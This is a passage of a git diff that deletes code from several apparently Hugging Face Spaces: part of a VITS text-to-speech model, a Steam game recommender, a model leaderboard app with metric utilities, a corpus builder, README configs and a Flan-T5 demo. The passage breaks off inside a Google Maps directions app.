torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class Generator(torch.nn.Module): - def __init__(self, initial_channel, resblock, resblock_kernel_sizes, resblock_dilation_sizes, upsample_rates, upsample_initial_channel, upsample_kernel_sizes, gin_channels=0): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d(initial_channel, upsample_initial_channel, 7, 1, padding=3) - resblock = modules.ResBlock1 if resblock == '1' else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append(weight_norm( - ConvTranspose1d(upsample_initial_channel//(2**i), upsample_initial_channel//(2**(i+1)), - k, u, padding=(k-u)//2))) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel//(2**(i+1)) - for j, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i*self.num_kernels+j](x) - else: - xs += self.resblocks[i*self.num_kernels+j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print('Removing weight norm...') - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - n_vocab, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - n_speakers=0, - gin_channels=0, - use_sdp=True, - emotion_embedding=False, - **kwargs): - - super().__init__() - self.n_vocab = n_vocab - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.n_speakers = n_speakers - self.gin_channels = gin_channels - - self.use_sdp = use_sdp - - self.enc_p = TextEncoder(n_vocab, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - emotion_embedding) - self.dec = Generator(inter_channels, resblock, resblock_kernel_sizes, resblock_dilation_sizes, upsample_rates, upsample_initial_channel, upsample_kernel_sizes, gin_channels=gin_channels) - self.enc_q = PosteriorEncoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - if use_sdp: - self.dp = StochasticDurationPredictor(hidden_channels, 192, 3, 0.5, 4, gin_channels=gin_channels) - else: - self.dp = DurationPredictor(hidden_channels, 256, 3, 0.5, gin_channels=gin_channels) - - if n_speakers > 1: - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - def forward(self, x, x_lengths, y, y_lengths, sid=None): - - x, m_p, logs_p, x_mask = self.enc_p(x, x_lengths) - if self.n_speakers > 0: - g = self.emb_g(sid).unsqueeze(-1) # [b, h, 1] - else: - g = None - - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - - with torch.no_grad(): - # negative cross-entropy - s_p_sq_r = torch.exp(-2 * logs_p) # [b, d, t] - neg_cent1 = torch.sum(-0.5 * math.log(2 * math.pi) - logs_p, [1], keepdim=True) # [b, 1, t_s] - neg_cent2 = torch.matmul(-0.5 * (z_p ** 2).transpose(1, 2), s_p_sq_r) # [b, t_t, d] x [b, d, t_s] = [b, t_t, t_s] - neg_cent3 = torch.matmul(z_p.transpose(1, 2), (m_p * s_p_sq_r)) # [b, t_t, d] x [b, d, t_s] = [b, t_t, t_s] - neg_cent4 = torch.sum(-0.5 * (m_p ** 2) * s_p_sq_r, [1], keepdim=True) # [b, 1, t_s] - neg_cent = neg_cent1 + neg_cent2 + neg_cent3 + neg_cent4 - - attn_mask = torch.unsqueeze(x_mask, 2) * torch.unsqueeze(y_mask, -1) - attn = monotonic_align.maximum_path(neg_cent, attn_mask.squeeze(1)).unsqueeze(1).detach() - - w = attn.sum(2) - if self.use_sdp: - l_length = self.dp(x, x_mask, w, g=g) - l_length = l_length / torch.sum(x_mask) - else: - logw_ = torch.log(w + 1e-6) * x_mask - logw = self.dp(x, x_mask, g=g) - l_length = torch.sum((logw - logw_)**2, [1,2]) / torch.sum(x_mask) # for averaging - - # expand prior - m_p = torch.matmul(attn.squeeze(1), m_p.transpose(1, 2)).transpose(1, 2) - logs_p = torch.matmul(attn.squeeze(1), logs_p.transpose(1, 2)).transpose(1, 2) - - z_slice, ids_slice = commons.rand_slice_segments(z, y_lengths, self.segment_size) - o = self.dec(z_slice, g=g) - return o, l_length, attn, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, x, x_lengths, sid=None, noise_scale=1, length_scale=1, noise_scale_w=1., max_len=None, emotion_embedding=None): - x, m_p, logs_p, x_mask = self.enc_p(x, x_lengths, emotion_embedding) - if self.n_speakers > 0: - g = self.emb_g(sid).unsqueeze(-1) # [b, h, 1] - else: - g = None - - if self.use_sdp: - logw = self.dp(x, x_mask, g=g, reverse=True, noise_scale=noise_scale_w) - else: - logw = self.dp(x, x_mask, g=g) - w = torch.exp(logw) * x_mask * length_scale - w_ceil = torch.ceil(w) - y_lengths = torch.clamp_min(torch.sum(w_ceil, [1, 2]), 1).long() - y_mask = torch.unsqueeze(commons.sequence_mask(y_lengths, None), 1).to(x_mask.dtype) - attn_mask = torch.unsqueeze(x_mask, 2) * torch.unsqueeze(y_mask, -1) - attn = commons.generate_path(w_ceil, attn_mask) - - m_p = torch.matmul(attn.squeeze(1), m_p.transpose(1, 2)).transpose(1, 2) # [b, t', t], [b, t, d] -> [b, d, t'] - logs_p = torch.matmul(attn.squeeze(1), logs_p.transpose(1, 2)).transpose(1, 2) # [b, t', t], [b, t, d] -> [b, d, t'] - - z_p = m_p + torch.randn_like(m_p) * torch.exp(logs_p) * noise_scale - z = self.flow(z_p, y_mask, g=g, reverse=True) - o = self.dec((z * y_mask)[:,:,:max_len], g=g) - return o, attn, y_mask, (z, z_p, m_p, logs_p) - - def voice_conversion(self, y, y_lengths, sid_src, sid_tgt): - assert self.n_speakers > 0, "n_speakers have to be larger than 0." - g_src = self.emb_g(sid_src).unsqueeze(-1) - g_tgt = self.emb_g(sid_tgt).unsqueeze(-1) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g_src) - z_p = self.flow(z, y_mask, g=g_src) - z_hat = self.flow(z_p, y_mask, g=g_tgt, reverse=True) - o_hat = self.dec(z_hat * y_mask, g=g_tgt) - return o_hat, y_mask, (z, z_p, z_hat) - diff --git a/spaces/ashuNicol/Steam-game-Recommendation-System/app.py b/spaces/ashuNicol/Steam-game-Recommendation-System/app.py deleted file mode 100644 index ee7e2dcb4c851c38b9ea7d39339587d42957afaa..0000000000000000000000000000000000000000 --- a/spaces/ashuNicol/Steam-game-Recommendation-System/app.py +++ /dev/null @@ -1,73 +0,0 @@ -import pickle -import streamlit as st -import pandas as pd - -st.set_page_config( - page_title="Steam Game's Recommender", - page_icon="🐼", - layout="wide", - initial_sidebar_state="expanded", -) - -with st.sidebar: - st.title("Contact Me") - st.divider() - st.write("Instagram: https://www.instagram.com/ashishprasad__/") - st.write("LinkedIn: https://www.linkedin.com/in/ashish-prasad-92223a228/") - st.write("Email: ashishprasd@gamil.com") - - -def recommend(game): - index = new_df[new_df['Name'] == game].index[0] - distances = sorted(list(enumerate(similarity[index])),reverse=True,key = lambda x: x[1]) - game_lists=[] - game_image_list=[] - for i in distances[1:7]: - game_lists.append(new_df.iloc[i[0]].Name) - game_image_list.append(game_image.iloc[i[0]].Headerimage) - return game_lists,game_image_list - -# uplode data -new_df=pickle.load(open("game_data.pkl",'rb')) -similarity=pickle.load(open("similarity.pkl",'rb')) -game_image=pd.read_csv("image_data.csv") -game_name = new_df['Name'].values - -st.title("Steam Game's Recommendation System by Ashish 🐼") -st.warning('There was only New Game Data Since 2021 to 2023') - -st.divider() - -option = st.selectbox( - 'Select or type The Game Name: ⬇️', - game_name) - -st.write('You selected:', option) -if st.button('🔍 Find!'): - st.toast("🙃 Enjoy!") - st.balloons() - st.header("Here are The Top 6 Game You also like 🎮:") - rec,img=recommend(option) - col1, col2, col3 = st.columns(3) - with col1: - st.image(img[0]) - st.subheader(rec[0]) - with col2: - st.image(img[1]) - st.subheader(rec[1]) - with col3: - st.image(img[2]) - st.subheader(rec[2]) - - col4,col5,col6 =st.columns(3) - with col4: - st.image(img[3]) - st.subheader(rec[3]) - with col5: - st.image(img[4]) - st.subheader(rec[4]) - with col6: - st.image(img[5]) - st.subheader(rec[5]) - st.success("🐰 Match Found!") - diff --git a/spaces/autoevaluate/leaderboards/app.py b/spaces/autoevaluate/leaderboards/app.py deleted file mode 100644 index 7fe8b21cce56ac7a782e6266ee43e5dc5eb4cfd4..0000000000000000000000000000000000000000 --- a/spaces/autoevaluate/leaderboards/app.py +++ /dev/null @@ -1,316 +0,0 @@ -import pandas as pd -import streamlit as st -from huggingface_hub import HfApi, hf_hub_download -from huggingface_hub.repocard import metadata_load -from utils import ascending_metrics, metric_ranges -import numpy as np -from st_aggrid import AgGrid, GridOptionsBuilder, JsCode -from os.path import exists -import threading - -st.set_page_config(layout="wide") - - -def get_model_infos(): - api = HfApi() - model_infos = api.list_models(filter="model-index", cardData=True) - return model_infos - - -def parse_metric_value(value): - if isinstance(value, str): - "".join(value.split("%")) - try: - value = float(value) - except: # noqa: E722 - value = None - elif isinstance(value, list): - if len(value) > 0: - value = value[0] - else: - value = None - value = round(value, 4) if isinstance(value, float) else None - return value - - -def parse_metrics_rows(meta, only_verified=False): - if not isinstance(meta["model-index"], list) or len(meta["model-index"]) == 0 or "results" not in meta["model-index"][0]: - return None - for result in meta["model-index"][0]["results"]: - if not isinstance(result, dict) or "dataset" not in result or "metrics" not in result or "type" not in result["dataset"]: - continue - dataset = result["dataset"]["type"] - if dataset == "": - continue - row = {"dataset": dataset, "split": "-unspecified-", "config": "-unspecified-"} - if "split" in result["dataset"]: - row["split"] = result["dataset"]["split"] - if "config" in result["dataset"]: - row["config"] = result["dataset"]["config"] - no_results = True - incorrect_results = False - for metric in result["metrics"]: - name = metric["type"].lower().strip() - - if name in ("model_id", "dataset", "split", "config", "pipeline_tag", "only_verified"): - # Metrics are not allowed to be named "dataset", "split", "config", "pipeline_tag" - continue - value = parse_metric_value(metric.get("value", None)) - if value is None: - continue - if name in row: - new_metric_better = value < row[name] if name in ascending_metrics else value > row[name] - if name not in row or new_metric_better: - # overwrite the metric if the new value is better. - - if only_verified: - if "verified" in metric and metric["verified"]: - no_results = False - row[name] = value - if name in metric_ranges: - if value < metric_ranges[name][0] or value > metric_ranges[name][1]: - incorrect_results = True - else: - no_results = False - row[name] = value - if name in metric_ranges: - if value < metric_ranges[name][0] or value > metric_ranges[name][1]: - incorrect_results = True - if no_results or incorrect_results: - continue - yield row - -@st.cache(ttl=0) -def get_data_wrapper(): - - def get_data(dataframe=None, verified_dataframe=None): - data = [] - verified_data = [] - print("getting model infos") - model_infos = get_model_infos() - print("got model infos") - for model_info in model_infos: - meta = model_info.cardData - if meta is None: - continue - for row in parse_metrics_rows(meta): - if row is None: - continue - row["model_id"] = model_info.id - row["pipeline_tag"] = model_info.pipeline_tag - row["only_verified"] = False - data.append(row) - for row in parse_metrics_rows(meta, only_verified=True): - if row is None: - continue - row["model_id"] = model_info.id - row["pipeline_tag"] = model_info.pipeline_tag - row["only_verified"] = True - data.append(row) - dataframe = pd.DataFrame.from_records(data) - dataframe.to_pickle("cache.pkl") - - if exists("cache.pkl"): - # If we have saved the results previously, call an asynchronous process - # to fetch the results and update the saved file. Don't make users wait - # while we fetch the new results. Instead, display the old results for - # now. The new results should be loaded when this method - # is called again. - dataframe = pd.read_pickle("cache.pkl") - t = threading.Thread(name="get_data procs", target=get_data) - t.start() - else: - # We have to make the users wait during the first startup of this app. - get_data() - dataframe = pd.read_pickle("cache.pkl") - - return dataframe - -dataframe = get_data_wrapper() - -st.markdown("# 🤗 Leaderboards") - -query_params = st.experimental_get_query_params() -if "first_query_params" not in st.session_state: - st.session_state.first_query_params = query_params -first_query_params = st.session_state.first_query_params - -default_task = first_query_params.get("task", [None])[0] -default_only_verified = bool(int(first_query_params.get("only_verified", [0])[0])) -print(default_only_verified) -default_dataset = first_query_params.get("dataset", [None])[0] -default_split = first_query_params.get("split", [None])[0] -default_config = first_query_params.get("config", [None])[0] -default_metric = first_query_params.get("metric", [None])[0] - -only_verified_results = st.sidebar.checkbox( - "Filter for Verified Results", - value=default_only_verified, - help="Select this checkbox if you want to see only results produced by the Hugging Face model evaluator, and no self-reported results." -) - -selectable_tasks = list(set(dataframe.pipeline_tag)) -if None in selectable_tasks: - selectable_tasks.remove(None) -selectable_tasks.sort(key=lambda name: name.lower()) -selectable_tasks = ["-any-"] + selectable_tasks - -task = st.sidebar.selectbox( - "Task", - selectable_tasks, - index=(selectable_tasks).index(default_task) if default_task in selectable_tasks else 0, - help="Filter the selectable datasets by task. Leave as \"-any-\" to see all selectable datasets." -) - -if task != "-any-": - dataframe = dataframe[dataframe.pipeline_tag == task] - -selectable_datasets = ["-any-"] + sorted(list(set(dataframe.dataset.tolist())), key=lambda name: name.lower()) -if "" in selectable_datasets: - selectable_datasets.remove("") - -dataset = st.sidebar.selectbox( - "Dataset", - selectable_datasets, - index=selectable_datasets.index(default_dataset) if default_dataset in selectable_datasets else 0, - help="Select a dataset to see the leaderboard!" -) - -dataframe = dataframe[dataframe.only_verified == only_verified_results] - -current_query_params = {"dataset": [dataset], "only_verified": [int(only_verified_results)], "task": [task]} - -st.experimental_set_query_params(**current_query_params) - -if dataset != "-any-": - dataset_df = dataframe[dataframe.dataset == dataset] -else: - dataset_df = dataframe - -dataset_df = dataset_df.dropna(axis="columns", how="all") - -if len(dataset_df) > 0: - selectable_configs = list(set(dataset_df["config"])) - selectable_configs.sort(key=lambda name: name.lower()) - - if "-unspecified-" in selectable_configs: - selectable_configs.remove("-unspecified-") - selectable_configs = ["-unspecified-"] + selectable_configs - - if dataset != "-any-": - config = st.sidebar.selectbox( - "Config", - selectable_configs, - index=selectable_configs.index(default_config) if default_config in selectable_configs else 0, - help="Filter the results on the current leaderboard by the dataset config. Self-reported results might not report the config, which is why \"-unspecified-\" is an option." - ) - dataset_df = dataset_df[dataset_df.config == config] - - selectable_splits = list(set(dataset_df["split"])) - selectable_splits.sort(key=lambda name: name.lower()) - - if "-unspecified-" in selectable_splits: - selectable_splits.remove("-unspecified-") - selectable_splits = ["-unspecified-"] + selectable_splits - - split = st.sidebar.selectbox( - "Split", - selectable_splits, - index=selectable_splits.index(default_split) if default_split in selectable_splits else 0, - help="Filter the results on the current leaderboard by the dataset split. Self-reported results might not report the split, which is why \"-unspecified-\" is an option." - ) - - current_query_params.update({"config": [config], "split": [split]}) - - st.experimental_set_query_params(**current_query_params) - - dataset_df = dataset_df[dataset_df.split == split] - - not_selectable_metrics = ["model_id", "dataset", "split", "config", "pipeline_tag", "only_verified"] - selectable_metrics = list(filter(lambda column: column not in not_selectable_metrics, dataset_df.columns)) - - dataset_df = dataset_df.filter(["model_id"] + (["dataset"] if dataset == "-any-" else []) + selectable_metrics) - dataset_df = dataset_df.dropna(thresh=2) # Want at least two non-na values (one for model_id and one for a metric). - - sorting_metric = st.sidebar.radio( - "Sorting Metric", - selectable_metrics, - index=selectable_metrics.index(default_metric) if default_metric in selectable_metrics else 0, - help="Select the metric to sort the leaderboard by. Click on the metric name in the leaderboard to reverse the sorting order." - ) - - current_query_params.update({"metric": [sorting_metric]}) - - st.experimental_set_query_params(**current_query_params) - - st.markdown( - "Please click on the model's name to be redirected to its model card." - ) - - st.markdown( - "Want to beat the leaderboard? Don't see your model here? Simply request an automatic evaluation [here](https://huggingface.co/spaces/autoevaluate/model-evaluator)." - ) - - st.markdown( - "If you do not see your self-reported results here, ensure that your results are in the expected range for all metrics. E.g., accuracy is 0-1, not 0-100." - ) - - if dataset == "-any-": - st.info( - "Note: you haven't chosen a dataset, so the leaderboard is showing the best scoring model for a random sample of the datasets available." - ) - - # Make the default metric appear right after model names and dataset names - cols = dataset_df.columns.tolist() - cols.remove(sorting_metric) - sorting_metric_index = 1 if dataset != "-any-" else 2 - cols = cols[:sorting_metric_index] + [sorting_metric] + cols[sorting_metric_index:] - dataset_df = dataset_df[cols] - - # Sort the leaderboard, giving the sorting metric highest priority and then ordering by other metrics in the case of equal values. - dataset_df = dataset_df.sort_values(by=cols[sorting_metric_index:], ascending=[metric in ascending_metrics for metric in cols[sorting_metric_index:]]) - dataset_df = dataset_df.replace(np.nan, '-') - - # If dataset is "-any-", only show the best model for a random sample of 100 datasets. - # Otherwise The leaderboard is way too long and doesn't give the users a feel for all of - # the datasets available for a task. - if dataset == "-any-": - filtered_dataset_df_dict = {column: [] for column in dataset_df.columns} - seen_datasets = set() - for _, row in dataset_df.iterrows(): - if row["dataset"] not in seen_datasets: - for column in dataset_df.columns: - filtered_dataset_df_dict[column].append(row[column]) - seen_datasets.add(row["dataset"]) - dataset_df = pd.DataFrame(filtered_dataset_df_dict) - dataset_df = dataset_df.sample(min(100, len(dataset_df))) - - # Make the leaderboard - gb = GridOptionsBuilder.from_dataframe(dataset_df) - gb.configure_default_column(sortable=False) - gb.configure_column( - "model_id", - cellRenderer=JsCode('''function(params) {return ''+params.value+''}'''), - ) - if dataset == "-any-": - gb.configure_column( - "dataset", - cellRenderer=JsCode('''function(params) {return ''+params.value+''}'''), - ) - for name in selectable_metrics: - gb.configure_column(name, type=["numericColumn","numberColumnFilter","customNumericFormat"], precision=4, aggFunc='sum') - - gb.configure_column( - sorting_metric, - sortable=True, - cellStyle=JsCode('''function(params) { return {'backgroundColor': '#FFD21E'}}''') - ) - - go = gb.build() - fit_columns = len(dataset_df.columns) < 10 - AgGrid(dataset_df, gridOptions=go, height=28*len(dataset_df) + (35 if fit_columns else 41), allow_unsafe_jscode=True, fit_columns_on_grid_load=fit_columns, enable_enterprise_modules=False) - -else: - st.markdown( - "No " + ("verified" if only_verified_results else "unverified") + " results to display. Try toggling the verified results filter." - ) \ No newline at end of file diff --git a/spaces/autoevaluate/leaderboards/utils.py b/spaces/autoevaluate/leaderboards/utils.py deleted file mode 100644 index b07d0b36c5a185f8a9753da79f5a23a2b1e168ab..0000000000000000000000000000000000000000 --- a/spaces/autoevaluate/leaderboards/utils.py +++ /dev/null @@ -1,35 +0,0 @@ -ascending_metrics = { - "wer", - "cer", - "loss", - "mae", - "mahalanobis", - "mse", - "perplexity", - "ter", -} - -metric_ranges = { - "accuracy": (0,1), - "precision": (0,1), - "recall": (0,1), - "macro f1": (0,1), - "micro f1": (0,1), - "pearson": (-1, 1), - "matthews_correlation": (-1, 1), - "spearmanr": (-1, 1), - "google_bleu": (0, 1), - "precision@10": (0, 1), - "mae": (0, 1), - "mauve": (0, 1), - "frontier_integral": (0, 1), - "mean_iou": (0, 1), - "mean_accuracy": (0, 1), - "overall_accuracy": (0, 1), - "meteor": (0, 1), - "mse": (0, 1), - "perplexity": (0, float("inf")), - "rogue1": (0, 1), - "rogue2": (0, 1), - "sari": (0, 100), -} \ No newline at end of file diff --git a/spaces/autosummproject/autosumm/corpora/corpora.py b/spaces/autosummproject/autosumm/corpora/corpora.py deleted file mode 100644 index df52802a021a581ac35c5cef6b9ce027ce6bb95a..0000000000000000000000000000000000000000 --- a/spaces/autosummproject/autosumm/corpora/corpora.py +++ /dev/null @@ -1,31 +0,0 @@ -from .sourcer import search_web -import pandas as pd -import os -import glob - -root_dir = 'data/datasets' - -pira_df = pd.read_csv(os.path.join(root_dir, 'pira_simplified.csv')) -pira_corpus = pira_df.text.to_list() - -txt_path = os.path.join(root_dir, 'onu') -filenames = glob.glob(txt_path + '/*.txt') - -onu_corpus = [] -for filename in filenames: - with open(filename, 'r') as f: - onu_corpus.append(f.read()) - -def gen_corpus(query: str, pira: bool=True, ONU: bool=True, web: bool=True)->list: - corpus = [] - if not (pira or ONU or web): - # TODO: raise error - pass - if pira: - corpus += pira_corpus - if ONU: - corpus += onu_corpus - if web: - corpus += search_web(query) - - return corpus \ No newline at end of file diff --git a/spaces/awacke1/CardGame/README.md b/spaces/awacke1/CardGame/README.md deleted file mode 100644 index 4882e21be09a5d96342d5a43a1c25694af98af05..0000000000000000000000000000000000000000 --- a/spaces/awacke1/CardGame/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: CardGame -emoji: 🏢 -colorFrom: red -colorTo: red -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/awacke1/Face_Recognition_with_Sentiment/README.md b/spaces/awacke1/Face_Recognition_with_Sentiment/README.md deleted file mode 100644 index 92bb2a069529721a0648def3f5802c80d6d596f1..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Face_Recognition_with_Sentiment/README.md +++ /dev/null @@ -1,15 +0,0 @@ ---- -title: Facial Recognition With Sentiment Detector -emoji: 👀 -colorFrom: indigo -colorTo: green -sdk: gradio -sdk_version: 3.3 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: schibsted/Facial_Recognition_with_Sentiment_Detector ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - diff --git a/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py b/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py deleted file mode 100644 index 2c2056ac6b44a46409ab7ef201297fad6ceca613..0000000000000000000000000000000000000000 --- a/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py +++ /dev/null @@ -1,79 +0,0 @@ -import gradio as gr -from transformers import T5Tokenizer, T5ForConditionalGeneration - -# xl size run out of memory on 16GB vm -tokenizer = T5Tokenizer.from_pretrained("google/flan-t5-large") -model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") - -title = "" - -def get_examples (): - return [ - ["Write a three sentence outline in markdown code on Being a Happier and Healthier Person"], - ["Write a three sentence outline in markdown code on Learn to Use Mindfulness to Affect Well Being"], - ["Write a three sentence outline in markdown code on Find Healthy Nutrition Habits"], - ["Write a three sentence outline in markdown code on Find Reasons and Cut Back or Quit Entirely"], - ["Write a three sentence outline in markdown code on Stress is relieved by quieting your mind, getting exercise and time with nature"], - ["Write a three sentence outline in markdown code on Reprogram Pain Stress Reactions"], - ["Write a three sentence outline in markdown code on Brain gamification"], - ["Write a three sentence outline in markdown code on Mental Body Scan"], - ["Write a three sentence outline in markdown code on Stretch, Calm, Breath"], - ["Write a three sentence outline in markdown code on Relaxed Seat Breath"], - ["Write a three sentence outline in markdown code on Walk Feel"], - ["Write a three sentence outline in markdown code on alleviating stress"], - ["Write a three sentence outline in markdown code on helping breathing, satisfaction"], - ["Write a three sentence outline in markdown code on Relieve Stress, Build Support"], - ["Write a three sentence outline in markdown code on Relaxation Response"], - ["Write a three sentence outline in markdown code on Deep Breaths"], - ["Write a three sentence outline in markdown code on Delete Not Helpful Thoughts"], - ["Write a three sentence outline in markdown code on Strengthen Helpful"], - ["Write a three sentence outline in markdown code on Sleep Better and Find Joy"], - ["Write a three sentence outline in markdown code on Yoga Sleep"], - ["Write a three sentence outline in markdown code on Relieve Pain"], - ["Write a three sentence outline in markdown code on Build and Boost Mental Strength"], - ["Write a three sentence outline in markdown code on Spending Time Outdoors"], - ["Write a three sentence outline in markdown code on Daily Routine Tasks"], - ["Write a three sentence outline in markdown code on Feel better each day when you awake by"], - ["Write a three sentence outline in markdown code on Feel better physically by"], - ["Write a three sentence outline in markdown code on Practicing mindfulness each day"], - ["Write a three sentence outline in markdown code on Be happier by"], - ["Write a three sentence outline in markdown code on Meditation can improve health"], - ["Write a three sentence outline in markdown code on Spending time outdoors"], - ["Write a three sentence outline in markdown code on Break the cycle of stress and anxiety"], - ["Write a three sentence outline in markdown code on Feel calm in stressful situations"], - ["Write a three sentence outline in markdown code on Deal with work pressure"], - ["Write a three sentence outline in markdown code on Learn to reduce feelings of overwhelmed"] - ] - - -def text2text(input_text): - input_ids = tokenizer(input_text, return_tensors="pt").input_ids - - outputs = model.generate(input_ids, max_length=200) - return tokenizer.decode(outputs[0]) - - -with gr.Blocks() as demo: - gr.Markdown( - """ - # Flan T5 Large Demo - 780M parameter Large language model fine tuned on diverse tasks. - Prompt the model in the Input box. - """) - txt_in = gr.Textbox(label="Input", lines=3) - correct_label = gr.Label(label="Correct") - txt_out = gr.Textbox(value="", label="Output", lines=4) - - - btn = gr.Button(value="Submit") - btn.click(text2text, inputs=[txt_in], outputs=[txt_out]) - - - gr.Examples( - examples=get_examples(), - inputs=[txt_in,correct_label] - ) - - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/awacke1/Streamlit-Google-Maps-California/app.py b/spaces/awacke1/Streamlit-Google-Maps-California/app.py deleted file mode 100644 index a4d34ca00c7f24e8f3c535ff3172dfc3423803c0..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Streamlit-Google-Maps-California/app.py +++ /dev/null @@ -1,85 +0,0 @@ -import streamlit as st -import folium -from folium.plugins import MarkerCluster -from streamlit_folium import folium_static -import googlemaps -from datetime import datetime -import os - -# Initialize Google Maps -gmaps = googlemaps.Client(key=os.getenv('GOOGLE_KEY')) - -# Function to fetch directions -def get_directions_and_coords(source, destination): - now = datetime.now() - directions_info = gmaps.directions(source, destination, mode='driving', departure_time=now) - if directions_info: - steps = directions_info[0]['legs'][0]['steps'] - coords = [(step['start_location']['lat'], step['start_location']['lng']) for step in steps] - return steps, coords - else: - return None, None - -# Function to render map with directions -def 